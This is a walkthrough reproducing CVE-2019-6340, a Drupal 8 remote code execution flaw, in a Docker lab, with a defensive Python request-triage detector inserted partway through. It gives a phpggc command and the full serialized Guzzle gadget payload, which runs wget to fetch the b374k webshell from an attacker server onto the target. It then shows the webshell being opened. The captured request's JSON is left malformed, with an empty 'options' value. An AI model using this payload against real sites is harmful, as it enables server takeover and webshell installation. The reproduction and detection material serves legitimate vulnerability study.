Reproducing CVE-2019-6340

CVE-2019-6340

Affected versions

  • Drupal 8.6.x < 8.6.10
  • Drupal 8.5.x < 8.5.11

Preconditions

  • The site has the Drupal 8 core RESTful Web Services (rest) module enabled and allows PATCH or POST requests
  • The site has another web services module enabled, such as JSON:API in Drupal 8, or Services or RESTful Web Services in Drupal 7

Reproduction steps

Pull the environment with Docker

  • docker pull knqyf263/cve-2019-6340
  • docker run -d -p 80:80 knqyf263/cve-2019-6340

Open the site in a browser

Capture the request with Burp

    GET /node/1?_format=hal_json HTTP/1.1
    Host: TARGET_IP
    Content-Type: application/hal+json
    Content-Length: 672

    {
      "link": [
        {
          "value": "link",
          "options":
        }
      ],
      "_links": {
        "type": {
          "href": "http://TARGET_IP/rest/type/shortcut/default"
        }
      }
    }
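A defender-side triage check, added here as an example and not part of the original write-up: it parses one raw HTTP request and reports the indicators visible in the captured packet above (a hal_json request carrying a body, a GET with a body, a _links.type.href pointing under /rest/type/, and a PHP serialized-object prefix inside any body string). The host names and the stdClass sample are constructed.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit
# Constructed samples (not captured traffic). The first mirrors the shape of the
# packet above: a HAL+JSON body on a GET with a serialized PHP object inside a
# link's "options"; the object is a harmless stdClass, not the Guzzle gadget.
SUSPICIOUS_REQUEST = (
    "GET /node/1?_format=hal_json HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "Content-Type: application/hal+json\r\n\r\n"
    '{"link":[{"value":"link","options":"O:8:\\"stdClass\\":0:{}"}],'
    '"_links":{"type":{"href":"http://example.test/rest/type/shortcut/default"}}}'
)
BENIGN_REQUEST = "GET /node/1?_format=hal_json HTTP/1.1\r\nHost: example.test\r\n\r\n"

# Prefix PHP's serialize() emits for an object: O:<len>:"<class>":<n>:{
PHP_OBJECT = re.compile(r'O:\d+:"[^"]+":\d+:\{')

def _strings(node):
    """Yield every string value nested anywhere in a parsed JSON document."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        yield from (s for v in node.values() for s in _strings(v))
    elif isinstance(node, list):
        yield from (s for v in node for s in _strings(v))

def analyze_request(raw: str) -> list:
    """Return the CVE-2019-6340 indicators present in one raw HTTP request."""
    head, _, body = raw.partition("\r\n\r\n")
    method, target, _ = head.split("\r\n", 1)[0].split(" ", 2)
    fmt = parse_qs(urlsplit(target).query).get("_format", [""])[0]
    indicators = []
    if fmt != "hal_json" or not body.strip():
        return indicators
    # The vulnerable REST module deserializes the body regardless of method.
    indicators.append("hal_json_request_with_body")
    if method == "GET":
        indicators.append("get_with_body")
    try:
        doc = json.loads(body)
    except ValueError:
        return indicators + ["unparseable_body"]
    links = doc.get("_links", {}) if isinstance(doc, dict) else {}
    if "/rest/type/" in links.get("type", {}).get("href", ""):
        indicators.append("rest_type_link")
    if any(PHP_OBJECT.search(s) for s in _strings(doc)):
        indicators.append("php_serialized_object_in_body")
    return indicators
```

Run it over request bodies recorded by a WAF or reverse proxy; a hal_json request with a body and a serialized-object prefix is worth alerting on even after patching, since it shows someone probing for the bug.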


Build the exploit

  • git clone https://github.com/ambionics/phpggc.git

  • Build an exp that downloads a webshell (a "大马", i.e. a full-featured webshell):

        ./phpggc guzzle/rce1 system "wget http://yourvpsip/b374k.php" -j

  • The resulting payload (the serialized Guzzle gadget chain, JSON-escaped by -j):

        "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:36:\"wget http:\/\/yourvpsip\/b374k.php\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"

Modify the packet

Open it in the browser

    http://TARGET_IP/b374k.php


Reproduction successful

References

https://www.ambionics.io/blog/drupal8-rce

https://kylingit.com/blog/sa-core-2019-003-drupal-%E5%86%85%E6%A0%B8%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

https://xz.aliyun.com/t/4213